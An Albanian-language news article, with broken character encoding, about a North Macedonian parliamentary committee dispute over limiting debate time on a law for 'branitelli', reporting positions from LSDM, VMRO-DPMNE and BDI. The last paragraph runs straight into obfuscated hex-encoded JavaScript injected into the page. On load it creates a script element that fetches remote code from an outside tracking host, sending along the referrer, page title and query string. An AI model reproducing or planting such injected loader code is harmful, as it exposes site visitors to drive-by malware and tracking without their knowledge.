largea_lsdm1352361845

LSDM mbA�shtet kufizimin e fjalimeve pA�r ‘branitellat’

Komisioni parlamentar pA�r punA� dhe politikA� sociale, ku po debatohet propozim/ligji pA�r branitellat, nesA�r do tA� vazhdojA� punA�n e tij, pas ndA�rprerjes disa ditore, pA�r shkak tA� keqinterpretimeve procedurale qA� u bA�nA� pas kA�rkesA�s sA� deputetA�ve tA� VMRO DPMNE-sA� pA�r shkurtimin e diskutimeve tA� anA�tarA�ve tA� komisionit.

Kryetarja e kA�tij trupi punues Cvetanka Ivanova nga LSDM-ja, tha sot se partia qA� ajo pA�rfaqA�son i mbA�shtet tA� gjitha propozimet e VMRO DPMNE-sA�, pA�rfshirA� edhe kA�rkesat e fundit pA�r shkurtimin e fjalimit tA� deputetA�ve.

a�?TA� gjitha propozimet qA� do tA� vijnA� nga deputetA�, do tA� vihen nA� votim; veA�anA�risht ai i VMRO-DPMNE-sA� pA�r kufizimin e diskutimeve pA�r tA� cilat LSDM-ja ka marrA� qA�ndrim tA� qartA�, pra mbA�shtesim qA� nA� kA�tA� seancA�, pA�r kA�tA� pikA� – kufizimin e diskutimeve, dhe e gjithA� kjo, nA� interes tA� miratimit efikas dhe tA� shpejtA� tA� ligjit pA�r a�?branitellata��, tha Cvetanka Ivanova, kryetare e Komisionit pA�r punA� dhe politikA� sociale

Deputeti i VMRO DPMNE-sA� AleksandA�r Nikollovski tha se pret qA� mbA�shtetja e LSDM-sA� tA� japA� rezultate nA� seancA�n e nesA�rme tA� komisionit. Ai theksoi se VMRO DPMNE po shqyrton tA� gjitha mundA�sitA� e rregullores pA�r pA�rshpejtimin e punA�s sA� Komisionit, qA� ligji tA� kalojA� sa mA� shpejtA� nA� seancA� plenare.

“DA�shiroj tA� theksoj se VMRO-DPMNE pA�rmes deputetit Vele Gjeorgjeievski, e ka dA�rguar tashmA� propozimin, i cili duhej tA� vihej nA� votim, pA�r kufizimin e diskutimeve nA� 10 minuta, replikat nA� 3 minuta dhe kundA�r replikat nA� 1 minutA�, me tA� drejtA� paraqitjeje vetA�m njA� herA� nga ana e deputetA�ve, qA� A�shtA� praktikA� edhe nA� kuadA�r tA� seancave plenare tA� parlamentit tA� MaqedonisA�a��, tha AleksandA�r Nikollovski, deputet i VMRO DPMNE-sA�

PA�r BDI-nA�, e cila pA�r kA�tA� A�A�shtje kA�rkoi mendim nga komisioni pA�r A�A�shtje tA� rregullores, kjo tentativA� e partive maqedonase A�shtA� tendencA� pA�r tA� cunguar lirinA� e shprehjes. Ne do tA� marrim pjesA� nA� seancA�n e nesA�rme ashtu siA� kemi marrA� pjesA� nA� tA� gjitha seancat qA� kanA� tA� bA�jnA� me ligjin pA�r tA� ashtuquajturit mbrojtA�s tA� integritetit tA� MaqedonisA�, deklaroi Devaja.

a�?Jemi tA� vetA�dijshA�m se ka tendencA� pA�r tA� suspenduar demokracinA� duke suspenduar tA� drejtA�n e shprehjes, ashtu siA� ka paralajmA�ruar kryetari jonA� disa herA� sot e ritheksojmA� qA�ndrimin tonA� se, marrja apo suspendimi i sA� drejtA�s pA�r tu shprehur nA� parlament A�shtA� paralajmA�rim pA�r suspendim tA� demokracisA� nA� vend. ShA�rbimet kuvendore, mund tA� mendojmA� forma mA� tA� ndryshme dhe mA� kreative pA�r tA� grupuar amendamentet si taktikA� pA�r tA� shkurtuar diskutimet megjithatA� ne jemi tA� pA�rgatitur pA�r gjitha kA�to sfidaa�?, tha Ermira Mehmeti Devaja, deputete e BDI-sA�.

Nga BDI paralajmA�rojnA� se nuk pA�rjashtojnA� mundA�sinA� qA� tA� pA�rdorin edhe komitetin pA�r marrA�dhA�nie mes bashkA�sive ndA�retnike pA�r tA� parandaluar miratimin eventual tA� projekt ligjit tA� branitellave. Puna e deritanishme e komisionit pA�r punA� dhe politikA� sociale u ndA�rpre pA�r shkak se propozuesit e ligjit pA�r branitellat, deputetA�t e VMRO DPMNE-sA� kA�rkuan shkurtimin e fjalimeve tA� deputetA�ve, dhe BDI-ja e A�oi A�A�shtjen pA�r mendim tek Komisioni pA�r A�A�shtje tA� rregullores.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}